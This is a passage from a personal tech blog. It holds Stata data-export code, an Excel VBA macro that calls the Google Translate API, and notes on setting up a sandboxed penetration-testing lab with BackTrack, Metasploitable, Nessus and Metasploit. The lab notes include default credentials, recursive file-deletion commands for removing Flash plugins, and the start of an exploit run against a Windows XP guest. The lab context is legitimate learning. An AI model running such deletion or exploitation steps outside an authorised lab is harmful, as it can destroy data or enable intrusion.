/> // di `"count = `count'"'<br /> file read `fhr' line<br /> <br /> if (`count'~=3) { // This line is units - we can throw this away<br /> file write `fhw' `"`line'"' _n<br /> // di `"`line'"'<br /> }<br /> }<br /> <br /> file close `fhr'<br /> file close `fhw'<br /> <br /> // We should save the value labels. Check to make sure that the label exists<br /> tempfile tfvaluelabels<br /> tempname nameofvaluelabel<br /> tempname variablenamewithlabel<br /> local `variablenamewithlabel' : word 2 of `varlist'<br /> local `nameofvaluelabel' : value label ``variablenamewithlabel''<br /> label save ``nameofvaluelabel'' using `"`tfvaluelabels'"', replace<br /> <br /> preserve<br /> qui insheet using `"`tf'"', t clear names<br /> <br /> // I want to restore the value levels and value labels<br /> do `"`tfvaluelabels'"'<br /> // ssc install labellist<br /> // levelsof ``nameofvaluelabel'', local(levels)<br /> labellist ``nameofvaluelabel''<br /> local levels = r(``nameofvaluelabel''_values)<br /> local labels = r(``nameofvaluelabel''_labels)<br /> <br /> save `"`pathtofile_withoutextension'_short.dta"', replace<br /><br /> drop total<br /> drop if _n == _N<br /> <br /> local count = 0<br /> local count_levels = 0<br /> foreach var of varlist * {<br /> local count = `count' + 1<br /> <br /> if (`count'==1) {<br /> qui rename `var' x<br /> }<br /> else {<br /> local count_levels = `count_levels' + 1<br /> local level : word `count_levels' of `levels'<br /> qui rename `var' _v`level'<br /> // qui rename `var' _v`count'<br /> local v`level'_labelforfilename = `"`var'"' // used for the filename for saving graphs of individual variables<br /> local v`level'_varlabel : variable label _v`level' // used for the subtitle in the plot of individual variables.<br /> }<br /> }<br /> <br /> // COME BACK TO THIS<br /> // graph each y var, then all y vars<br /> <br /> foreach level of local levels {<br /> `gcmd' (asis) _v`level', over(x, ) `goptions' subtitle(`"`v`level'_varlabel'"')<br /> 
graph export "`pathtofile_withoutextension'_`v`level'_labelforfilename'.pdf", replace<br /> }<br /> /*<br /> forv x = 2/`count' {<br /> `gcmd' (asis) _v`x', over(x) `goptions' subtitle(`"`v`x'_varlabel'"')<br /> // di `"subtitle: subtitle(`"`v`x'_varlabel'"'), `v`x'_varlabel', v`x'_varlabel"'<br /> graph export "`pathtofile_withoutextension'_`v`x'_labelforfilename'.pdf", replace<br /> }<br /> */<br /> <br /> // graph all yvars<br /> qui reshape long _v, i(x) j(category)<br /> // cap tostring category, replace<br /> label values category ``nameofvaluelabel''<br /><br /> /*<br /> forv x = 2/`count' {<br /> qui replace category = `"`v`x'_varlabel'"' if category == `"`x'"'<br /> }<br /> */<br /> `gcmd' (asis) _v, over(category, `overcategorysuboptions') over(x, `overxsuboptions') asyvars `goptions'<br /> graph export "`pathtofile_withoutextension'_allvars.pdf", replace<br /> save `"`pathtofile_withoutextension'_long.dta"', replace<br /> restore<br />end program</span></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-41258773759233769962012-11-23T15:00:00.002-08:002012-11-26T19:32:40.205-08:00MS Excel VBA script to translate worksheets using the google translate API<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
UPDATE: I've made an Excel Add-In that you can download <a href="https://docs.google.com/open?id=0BwOJxAq1e-5URUlQUWdKZ2dYNFE" target="_blank">here</a>. Add it in to your worksheet and type Control+Shift+T to start the macro. I'll try to make a YouTube video to demonstrate.<br />
<br />
UPDATE #2: Here is a <a href="http://www.youtube.com/watch?v=ph6auAGXN-w&feature=plcp" target="_blank">YouTube video</a> to show how to download and install the add-in. <br />
<br />
A while ago I wrote some code in Perl to translate excel sheets using google translate while preserving the formatting. That way was long, unreliable, complicated, etc. Here is a better solution.<br />
<br />
Put the following MS Excel VBA macro code into your personal workbook, and create a shortcut to it (I use Ctrl+shift+t). It uses the google translate API. It will translate all non-empty, non-numeric cells in the active worksheet, placing the translation into a new worksheet, with the original formatting. It will place the original of numeric cells (not translated) into the new worksheet. The new worksheet will be the name of the old worksheet, with an underscore and the two letter language code appended onto it. If a worksheet with that name already exists, it will be deleted.<br />
<br />
You will have to specify the following in a dialog box that will pop up when you run the Macro (or just in the code - I don't know how to paste the code for the userform here):<br />
1. your google API key. The google translate API is not free, right now it is $20 per 1M characters<br />
2. two letter language code for the source language <br />
3. two letter language code for the destination language<br />
<br />
(for 2 and 3, you have to use the language codes that the google translate API supports. See https://developers.google.com/translate/) <br />
<br />
Maybe I'll modify this one day to use autodetect for the language, so that you can translate multiple languages on the same worksheet.<br />
<br />
Feedback is always appreciated. Good luck!<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">Sub TranslateWorsheet()<br /><br /> ' I got the URL encoding function here: http://stackoverflow.com/questions/218181/how-can-i-url-encode-a-string-in-excel-vba<br /> ' To run this script, you need to add "Microsoft Script Control" as reference (Tools -> References in the VB Editor)<br /><br /> ' Step 1: Create a new worksheet: existing worksheetname_2lettertargetlanguagecode<br /> ' Step 2: In the current sheet, loop through all non-empty cells <br /> ' a) send the REST request to API to translate the contents of the cell if it is non-numeric, otherwise paste the original cell contents<br /> ' b) put the translated contents in the corresponding cell of the new worksheet<br /> ' c) copy also the formatting of the cell<br /><br /> Dim destinationWorksheetName As String<br /> Dim sourceWorksheetName As String<br /> Dim cellContent As String<br /> Dim cellAddress As String<br /> Dim sourceWorksheet As Worksheet<br /> Dim destinationWorksheet As Worksheet<br /> <br /> Dim ScriptEngine As ScriptControl<br /> Set ScriptEngine = New ScriptControl<br /> ScriptEngine.Language = "JScript"<br /> ScriptEngine.AddCode "function encode(str) {return encodeURIComponent(str);}"<br /> <br /> ' use a regular expression to get the translation<br /> Dim RE As Object<br /> Set RE = CreateObject("VBScript.RegExp")<br /> RE.Pattern = "\[\s*{\s*""translatedText"": ""(.*)""\s}*"<br /> RE.IgnoreCase = False<br /> RE.Global = False<br /> RE.MultiLine = True<br /> Dim testResult As Boolean<br /> <br /> ' send the translation request<br /> Dim REMatches As Object<br /> Dim translateD As String<br /> Dim sourceString As String<br /> Dim K As String<br /> Dim URL As String<br /> Dim encodedSourceString As String<br /> Dim sourceLanguage As String<br /> Dim destinationLanguage As String<br /> Set sourceWorksheet = ActiveSheet<br /> sourceWorksheetName = ActiveSheet.Name<br /> <br /> ' sourceString = "Hello World"<br /> destinationLanguage = 
"EN"<br /> sourceLanguage = "RU"<br /> K = InputBox(prompt:="Please enter your Google Translate API key", Title:="Google Translate API Key Required: For more info, see https://developers.google.com/translate/v2/getting_started")<br /><br /> 'obTranslateOptions.Show<br /> 'sourceLanguage = obTranslateOptions.obSourceLanguage.Text<br /> 'destinationLanguage = obTranslateOptions.obDestinationLanguage.Text<br /> 'K = obTranslateOptions.obKey.Text<br /><br /> 'Debug.Print "K=" & K<br /> 'Debug.Print "sourceLanguage=" & sourceLanguage<br /> 'Debug.Print "destinationLanguage=" & destinationLanguage<br /> <br /> ' Unload obTranslateOptions<br /> <br /> ' If a worksheet of this name in this workbook already exist, then delete it<br /> destinationWorksheetName = sourceWorksheetName & "_" & destinationLanguage<br /> Application.DisplayAlerts = False<br /> On Error Resume Next<br /> Sheets(destinationWorksheetName).Delete<br /> Application.DisplayAlerts = True<br /> On Error GoTo 0<br /> <br /> ' Prepare to send the request<br /> Dim objHTTP As Variant<br /> Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")<br /> Dim responseT As String<br /> <br /> ' copy active worksheet, clear contents of the copy<br /> ActiveWorkbook.ActiveSheet.Copy after:=ActiveWorkbook.ActiveSheet<br /> ActiveSheet.Name = destinationWorksheetName<br /> ActiveSheet.Cells.ClearContents<br /> Set destinationWorksheet = ActiveSheet<br /> <br /> sourceWorksheet.Activate<br /> ' loop through all non-empty cells or all selected cells<br /> Dim cell As Range<br /> For Each cell In ActiveSheet.UsedRange.Cells<br /> <br /> 'Debug.Print cell.Address<br /> cellAddress = cell.Address<br /> sourceString = cell.Value<br /> 'Debug.Print "sourceString:" & sourceString<br /> <br /> ' do only for non-numeric cells<br /> If (IsNumeric(cell.Value) = False) Then<br /> <br /> ' encode the source text<br /> encodedSourceString = ScriptEngine.Run("encode", sourceString)<br /> ' prepare and send the request<br /> URL = 
"https://www.googleapis.com/language/translate/v2?key=" & K & "&source=" & sourceLanguage & "&target=" & destinationLanguage & "&q=" & encodedSourceString<br /> objHTTP.Open "GET", URL, False<br /> objHTTP.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"<br /> objHTTP.send ("")<br /> responseT = objHTTP.ResponseText<br /> ' Debug.Print "responseT:" & responseT<br /> <br /> ' pull the translation from the response to the request<br /> If (RE.Test(responseT) = True) Then<br /> 'Debug.Print "re.test is true"<br /> Set REMatches = RE.Execute(responseT)<br /> translateD = REMatches.Item(0).SubMatches.Item(0)<br /> 'Debug.Print "translateD:" & translateD<br /> Else<br /> 'Debug.Print "re.test is false"<br /> ' No translation found in the response: fall back to the original text instead of reusing the previous cell's translation<br /> translateD = sourceString<br /> End If<br /> <br /> destinationWorksheet.Range(cellAddress).Value = translateD<br /> Else<br /> destinationWorksheet.Range(cellAddress).Value = cell.Value<br /> End If<br /> Next<br /> <br />End Sub</span></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com13tag:blogger.com,1999:blog-2722671667390463266.post-77845040165938389242012-11-23T11:09:00.001-08:002012-11-23T15:51:51.284-08:00Stata Tutorial 3 is now up on youtube.com<div dir="ltr" style="text-align: left;" trbidi="on">
Stata Tutorial 3: insheet, append, use, sort, merge, outsheet. Here is the link to the youtube video:<br />
<br />
https://www.youtube.com/watch?v=8JA5nZPdqIk&feature=plcp<br />
<br />
The do file is available at:<br />
<br />
https://docs.google.com/document/d/1RouCrQOhxc9CoDs5XryY3RgUPP5r_j39_LanPKmGu3Q/edit<br />
<br />
and the log file is available at:<br />
<br />
https://docs.google.com/document/d/1nkFknJ7fOzbNiejM7SZi2LcLDsaYdrnd4__ZdYrgF8A/edit<br />
<br />
Enjoy!</div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-43951766622985816172012-08-24T03:25:00.000-07:002012-12-03T00:17:33.982-08:00Stata tip: a wrapper for the outsheet command that can write variable labels instead of variable names<div dir="ltr" style="text-align: left;" trbidi="on">
One limitation of Stata's outsheet command is that it does not give you the option of writing variable labels instead of variable names on the first line. To solve this, I wrote an ado file that is a wrapper for the outsheet command:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
// This ado file is a wrapper for the outsheet stata command that allows one to put the variable labels instead of the variable names on the first line of the file.</div>
<div style="font-family: "Courier New",Courier,monospace;">
<br /></div>
<div style="font-family: "Courier New",Courier,monospace;">
program define outsheet_varlabels </div>
<div style="font-family: "Courier New",Courier,monospace;">
<br /></div>
<div style="font-family: "Courier New",Courier,monospace;">
syntax [varlist] using/ [,Comma DELIMiter(string) NONames NOLabel NOQuote replace VARLabels] </div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
// if no varlist, that means outsheet all variables</div>
<div style="font-family: "Courier New",Courier,monospace;">
if ("`varlist'"=="") {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local varlist "*"</div>
<div style="font-family: "Courier New",Courier,monospace;">
} </div>
<div style="font-family: "Courier New",Courier,monospace;">
// Let's make sure that the delimiter is passed on to the outsheet command correctly. At the same time, I need the delimiter without quotes for the first line that I will write for the heading. </div>
<div style="font-family: "Courier New",Courier,monospace;">
if (`"`delimiter'"'~="") {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local delimiterchar = `"`delimiter'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
local delimiter `"delimiter("`delimiter'")"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
} </div>
<div style="font-family: "Courier New",Courier,monospace;">
else {</div>
<div style="font-family: "Courier New",Courier,monospace;">
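local delimiterchar = cond("`comma'"=="", char(9), ",") // outsheet writes tab-separated output unless the comma option is given</div>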
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"new delimiter macro: `delimiter'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"delimiterchar = `delimiterchar'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// Did the user say "noquote"? If not, then make sure the variable labels line below is double quoted</div>
<div style="font-family: "Courier New",Courier,monospace;">
if (`"`noquote'"'~="noquote") {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local quote = `"""'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"use quotes: `quote'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
if ("`varlabels'" == "") { // If user did not specify the variable labels option, then just call outsheet as is</div>
<div style="font-family: "Courier New",Courier,monospace;">
outsheet `varlist' using `"`using'"', `comma' `delimiter' `nonames' `nolabel' `noquote' `replace'</div>
<div style="font-family: "Courier New",Courier,monospace;">
} </div>
<div style="font-family: "Courier New",Courier,monospace;">
else { // Otherwise, write the variable labels instead of the variable names. Line 1 of the output will hold the variable labels</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
tempfile tempoutsheetfile</div>
<div style="font-family: "Courier New",Courier,monospace;">
qui outsheet `varlist' using `"`tempoutsheetfile'"', `comma' `delimiter' `nonames' `nolabel' `noquote' `replace'</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
// Here, construct the first line</div>
<div style="font-family: "Courier New",Courier,monospace;">
local count = 0</div>
<div style="font-family: "Courier New",Courier,monospace;">
foreach var of varlist `varlist' {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local varlabel : variable label `var'</div>
<div style="font-family: "Courier New",Courier,monospace;">
if (`"`varlabel'"'=="") { // What if the variable has no label? Then use the variable name instead</div>
<div style="font-family: "Courier New",Courier,monospace;">
local varlabel `"`var'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di "var: `var'"</div>
<div style="font-family: "Courier New",Courier,monospace;">
local count = `count' + 1</div>
<div style="font-family: "Courier New",Courier,monospace;">
if (`count'==1) { // Don't want a comma before the first item.</div>
<div style="font-family: "Courier New",Courier,monospace;">
local line1heading `"`quote'`varlabel'`quote'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"`quote'`varlabel'`quote'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
else {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local line1heading `"`line1heading'`delimiterchar'`quote'`varlabel'`quote'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"`line1heading'`delimiterchar'`quote'`varlabel'`quote'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"`line1heading'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di ""</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
/* // This method does not work. It overwrites, rather than inserts</div>
<div style="font-family: "Courier New",Courier,monospace;">
tempname fht</div>
<div style="font-family: "Courier New",Courier,monospace;">
file open `fht' using `"`using'"', read write t all</div>
<div style="font-family: "Courier New",Courier,monospace;">
file seek `fht' tof</div>
<div style="font-family: "Courier New",Courier,monospace;">
file write `fht' _n `"`line1heading'"' _n</div>
<div style="font-family: "Courier New",Courier,monospace;">
file close `fht'</div>
<div style="font-family: "Courier New",Courier,monospace;">
*/</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
// Try open tempoutsheetfile as read, the final file as write with the line1heading as the first line</div>
<div style="font-family: "Courier New",Courier,monospace;">
// This is the final file</div>
<div style="font-family: "Courier New",Courier,monospace;">
tempname fh_write</div>
<div style="font-family: "Courier New",Courier,monospace;">
file open `fh_write' using `"`using'"', t write all replace</div>
<div style="font-family: "Courier New",Courier,monospace;">
file write `fh_write' `"`line1heading'"' _n</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
// Read from this and put in the final file</div>
<div style="font-family: "Courier New",Courier,monospace;">
tempname fh_read</div>
<div style="font-family: "Courier New",Courier,monospace;">
file open `fh_read' using `"`tempoutsheetfile'"', t read </div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
file read `fh_read' readfileline</div>
<div style="font-family: "Courier New",Courier,monospace;">
local count = 0</div>
<div style="font-family: "Courier New",Courier,monospace;">
while r(eof)==0 {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local count = `count' + 1</div>
<div style="font-family: "Courier New",Courier,monospace;">
if (`count'~=1) {</div>
<div style="font-family: "Courier New",Courier,monospace;">
file write `fh_write' `"`readfileline'"' _n</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
file read `fh_read' readfileline</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
file close `fh_write'</div>
<div style="font-family: "Courier New",Courier,monospace;">
file close `fh_read' </div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"syntax: `varlist' `using', `comma' `delimiter' `nonames' `nolabel' `noquote' `replace'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
<br /></div>
<div style="font-family: "Courier New",Courier,monospace;">
end<br />
<br />
<span style="font-family: inherit;">To call this program so that it writes the variable labels instead of the variable names to the first line, call it just as you would the <span style="font-family: "Courier New", Courier, monospace;">outsheet<span style="font-family: inherit;"> command, but with the <span style="font-family: "Courier New", Courier, monospace;">varlabels<span style="font-family: inherit;"> option:</span></span></span></span></span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">outsheet_varlabels </span><span style="font-family: inherit;">using filename.csv, c replace </span><span style="font-family: "Courier New",Courier,monospace;">varlabels</span></div>
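<br />
If you want to see what the last part of the program does outside of Stata, the same "swap the first line" step can be sketched in the shell. This is just an illustration, not part of the ado file: replace_header is a made-up name, and the sketch assumes the data file has exactly one header line.<br />

```shell
# Hypothetical helper: print a new header line, then every line of the
# input file except its original first line (mirrors the ado file's read/write loop).
replace_header() {
    new_header=$1   # the full header line to write, already quoted and delimited
    infile=$2       # file produced by a plain outsheet call
    printf '%s\n' "$new_header"
    tail -n +2 "$infile"
}

# Usage: replace_header '"Household ID","Income"' data.csv > data_labels.csv
```

The ado file does the same thing with two file handles because Stata cannot insert a line at the top of an existing file; it can only overwrite or append.<br />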
</div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-85884616434797917222012-06-04T21:54:00.001-07:002012-06-04T21:54:54.052-07:00Working through another hacking book<div dir="ltr" style="text-align: left;" trbidi="on">
I've pretty much finished the hacking/penetration testing book by Pat Engebretson, and I've started another:<br />
<br />
<a href="http://www.amazon.com/gp/product/159327288X/ref=as_li_ss_tl?ie=UTF8&tag=ohmission-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=159327288X" target="_blank">Metasploit: The Penetration Tester's Guide</a><br />
by Kennedy et al<br />
<br />
I'm still using BackTrack 5 R2. Here are some things I had to do in order to work through this book:<br />
<br />
1. See <a href="http://teh-geek.com/?p=136" target="_blank">installing postgres-8.4</a> and <a href="https://help.ubuntu.com/10.04/serverguide/postgresql.html" target="_blank">changing the password for user postgres</a>. In Backtrack 5 R2, I had to install postgresql 8.4 (the book uses 8.3, but I think 8.4 will work just fine):<br />
<br />
apt-get install postgresql-8.4<br />
<br />
Then I had to change the password for the user <i>postgres</i> to <i>toor</i>:<br />
<br />
sudo -u postgres psql template1<br />
<pre class="screen"><span class="command"><strong>ALTER USER postgres with encrypted password 'toor';</strong></span></pre>
<pre class="screen"><span class="command"><strong> </strong></span></pre>
Type \q (or press Ctrl+D) to exit psql, and I think you should be all set.<br />
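<br />
The password change can probably also be done in one non-interactive command, which saves opening and leaving the psql prompt. A minimal sketch, assuming sudo and psql are set up as above; set_pg_password and the DRY_RUN switch are names I made up for illustration:<br />

```shell
# Hypothetical helper: set the password of the postgres user without an interactive session.
# With DRY_RUN=1 it only prints the SQL statement instead of running it.
set_pg_password() {
    pw=$1
    sql="ALTER USER postgres WITH ENCRYPTED PASSWORD '$pw';"
    if [ "${DRY_RUN:-0}" = "1" ]; then
        printf '%s\n' "$sql"
    else
        sudo -u postgres psql -d template1 -c "$sql"
    fi
}

# Usage: set_pg_password toor
```

Note that the sketch does no escaping, so it will break on a password that contains a single quote.<br />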
<br />
<br /></div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-18284957164539728102012-05-28T06:46:00.003-07:002012-06-26T13:53:24.072-07:00Setting up a hacking lab (sandboxed environment) using virtualbox guest<div dir="ltr" style="text-align: left;" trbidi="on">
I've been working my way through a book on hacking and penetration testing:<br />
<br />
<a href="http://www.amazon.com/gp/product/1597496553/ref=as_li_ss_tl?ie=UTF8&tag=ohmission-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=1597496553" target="_blank">The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (Syngress Basics Series)</a><br />
<br />
Overall, it is a good read, and great for beginners like me. One shortcoming is that it doesn't tell you how to set up a hacking lab on your computer. That is, how to set up different operating systems running on virtual machines (like virtualbox), as an alternative to networking multiple physical machines. I struggled a bit to set up a hacking lab, so I thought I would post my notes here.<br />
<br />
Steps:<br />
<br />
1. Download VirtualBox (<a href="https://www.virtualbox.org/" target="_blank">https://www.virtualbox.org/</a>) for whatever operating system you are using. I started off using a Mac running Snow Leopard, but my Mac is old and can't handle much, so I switched to a PC running Windows 7 with 8 GB RAM (64 bit machine), which I have available.<br />
<br />
2. Download BackTrack Linux (<a href="http://www.backtrack-linux.org/" target="_blank">http://www.backtrack-linux.org</a>) and make sure you follow the instructions on these two pages: <a href="http://www.backtrack-linux.org/wiki/index.php/VirtualBox_Install" target="_blank">http://www.backtrack-linux.org/wiki/index.php/VirtualBox_Install</a> and <a href="http://www.backtrack-linux.org/wiki/index.php/Install_BackTrack_to_Disk" target="_blank">http://www.backtrack-linux.org/wiki/index.php/Install_BackTrack_to_Disk</a><br />
<br />
One modification: AFTER installing backtrack but BEFORE installing virtualbox guest additions, do the following:<br />
<br />
apt-get update<br />
apt-get upgrade<br />
apt-get install dkms<br />
<br />
3. Download a couple of operating systems to use as targets to practice on (this is what is recommended in the book). Here are some options:<br />
- Windows XP, preferably with no service pack, or SP1. If you can only get SP2 or SP3, then fine.<br />
- Metasploitable (<a href="http://www.offensive-security.com/metasploit-unleashed/Metasploitable" target="_blank">http://www.offensive-security.com/metasploit-unleashed/Metasploitable</a>). This is the link to the torrent file.<br />
- Anything else you want to try. Windows 7 maybe? An older version of Ubuntu?<br />
<br />
4. Set up the "guest" virtual machines for these other operating systems in much the same way you installed BackTrack Linux, following the <a href="https://www.virtualbox.org/wiki/Documentation" target="_blank">documentation</a> for VirtualBox. BUT, you should make one change to the default settings that the book and the above resources (except the VirtualBox documentation) do not mention: for EACH guest machine, under "Settings" -> "Network", in the "Attached to:" field, select "Bridged Adapter" from the drop-down menu (instead of the default NAT). Then go ahead and start your guest machines.<br />
<br />
This will allow your machines to ping, nmap, etc. each other (note that if Windows XP firewall is enabled, then it won't reply to pings, nmap, etc.).<br />
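<br />
A quick way to confirm that the guests can actually see each other is to ping each one once from the BackTrack machine. Here is a small sketch; check_hosts and the PROBE variable are names I made up, the IP addresses are whatever your guests were assigned, and the ping options assume the Linux version of ping:<br />

```shell
# Hypothetical helper: report which lab machines answer a single probe.
# PROBE can be overridden (for example for a dry run); by default it is
# one ping with a one-second timeout.
check_hosts() {
    for host in "$@"; do
        if ${PROBE:-ping -c 1 -W 1} "$host" >/dev/null 2>&1; then
            echo "$host up"
        else
            echo "$host down"
        fi
    done
}

# Usage: check_hosts 192.168.1.20 192.168.1.21
```

Remember that a "down" result for the Windows XP guest may only mean that its firewall is dropping pings.<br />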
<br />
Installing Win XP in a guest machine was pretty easy. The same is true for Metasploitable, once you know what to do, which is the following (after you have unzipped the metasploitable.zip file):<br />
<br />
1. In the Virtualbox Manager (I'm using 4.1.16 r78094), click "New" then "Next"<br />
2. Enter a name for the virtual machine, e.g. metasploit<br />
3. Select the amount of memory, e.g. 512 MB and click next<br />
4. Leave Startup Disk checked, and select "Use Existing Hard Disk". Click the folder and navigate to the Metasploitable.vmdk file<br />
5. Click Open, then Create.<br />
<br />
Don't forget to change the Video memory to 64 MB (or 128 MB), and change the Network to Bridged Adapter.<br />
<br />
Also, the login credentials for Metasploitable are user: msfadmin, and password: msfadmin.<br />
<br />
UPDATE 1: There is a typo on page 34 of the book. "set type 5 mx" should instead be "set type = mx"<br />
<br />
UPDATE 2: Getting Nessus to work on Firefox running on Backtrack Linux 5 R2 was a pain - the official instructions at the backtrack wiki actually do not work for x64 - but I eventually got it working (for 32 bit, even on a 64 bit machine with BT 64 bit). Here is how (thanks to <a href="http://www.backtrack-linux.org/wiki/index.php/Install_Flash_Player" target="_blank">the backtrack wiki</a> and <a href="http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,8604.msg48011/" target="_blank">this post</a>). First follow the instructions at the <a href="http://www.backtrack-linux.org/wiki/index.php/Install_Flash_Player" target="_blank">backtrack wiki page with instructions to install flash player</a> ONLY TO REMOVE the existing flash installation on backtrack (if there is any). Don't do the rest yet:<br />
<br />
<pre>root@bt:~# <span style="color: red;">apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozilla</span>
root@bt:~# <span style="color: red;">rm -f /usr/lib/firefox/plugins/*flash*</span>
root@bt:~# <span style="color: red;">rm -f /usr/lib/firefox-addons/plugins/*flash*</span>
root@bt:~# <span style="color: red;">rm -f /usr/lib/mozilla/plugins/*flash*</span>
root@bt:~# <span style="color: red;">rm -f ~/.mozilla/plugins/*flash*so</span>
root@bt:~# <span style="color: red;">rm -rfd /usr/lib/nspluginwrapper</span></pre>
<br />
These instructions are fine. Now SKIP the part about installing for x64. Next, use the following commands to get the flash player and install the plug-in:<br />
<br />
<br />
<pre style="display: inline; margin-top: 0;">wget http://fpdownload.macromedia.com/get/flashplayer/pdc/11.1.102.63/install_flash_player_11_linux.i386.tar.gz
tar xvzf install_flash_player_11_linux.i386.tar.gz
mkdir -p ~/.mozilla/plugins
mv libflashplayer.so ~/.mozilla/plugins/</pre>
<br />
UPDATE 2a: now install nessus:<br />
<br />
apt-get install nessus<br />
<br />
You can add a user now (by typing at the prompt: /opt/nessus/sbin/nessus-adduser) or later. Now register for an activation code at: <a href="http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code" target="_blank">http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code</a><br />
<br />
You will receive an activation code by email. Let's call this @activation_code@. Once you get it, run the following command (replacing @activation_code@ with your activation code - yes, replace the @ symbols too):<br />
<br />
/opt/nessus/bin/nessus-fetch --register @activation_code@<br />
<br />
UPDATE 3: To log into nessus, you will need to create a user account on nessus. To do so, open up the console and enter the following command:<br />
<br />
/opt/nessus/sbin/nessus-adduser<br />
<br />
UPDATE 3a: To start nessus, you must type at the command prompt:<br />
<br />
/opt/nessus/sbin/nessus-service -D<br />
<br />
After Nessus processes the plugins, it should be ready to use. Note that we are using the 32 bit version (I don't know why the 64 bit version doesn't work). Now you should be able to start Firefox, navigate to Nessus (https://127.0.0.1:8834) and see a login screen.<br />
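<br />
Processing the plugins can take a while, so instead of reloading the browser you could poll the port from a terminal. A rough sketch, assuming curl is installed; nessus_ready and NESSUS_URL are made-up names, and -k is there because the Nessus certificate will not verify against a normal CA bundle:<br />

```shell
# Hypothetical helper: succeed once something answers on the Nessus web port.
# NESSUS_URL can be overridden; the default is the address used in this post.
nessus_ready() {
    curl -k -s -o /dev/null --max-time 5 "${NESSUS_URL:-https://127.0.0.1:8834}"
}

# Usage (waits until the login page is reachable):
#   until nessus_ready; do sleep 10; done; echo "Nessus is answering"
```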
<br />
UPDATE 4: On page 72 of the book, you are instructed to launch Metasploit using the following command:<br />
<br />
/pentest/exploits/framework3/msfconsole <br />
<br />
On backtrack linux R2 64 bit, this won't work. Instead you might use:<br />
<br />
/pentest/exploits/framework2/msfconsole<br />
<br />
This will launch Metasploit, but there is another problem. On page 74 of the book, you are instructed to use the "search" command in Metasploit. It won't work - the search command is not supported. Instead, you need to update Metasploit. From the terminal, type:<br />
<br />
msfupdate<br />
<br />
(but FIRST, you might want to follow this advice at this link: <a href="http://www.backtrack-linux.org/forums/showthread.php?t=48556&p=216008" target="_blank">update Metasploit on Backtrack Linux R2</a>). This will take some time. After it is done, launch Metasploit:<br />
<br />
msfconsole<br />
<br />
And at the "<u>msf</u> > " prompt, check to see that you have the latest version:<br />
<br />
<u>msf</u> >version<br />
<br />
(just type <i>version</i> at the prompt). Now you should be able to use the search command in Metasploit.<br />
<br />
UPDATE 5: After following some instructions from the book, you'll start an exploit using the "exploit" command at the msf prompt. For example, I am practicing attacking a VirtualBox guest running Windows XP SP2, so after launching msfconsole, I did the following at the msf > prompt:<br />
<br />
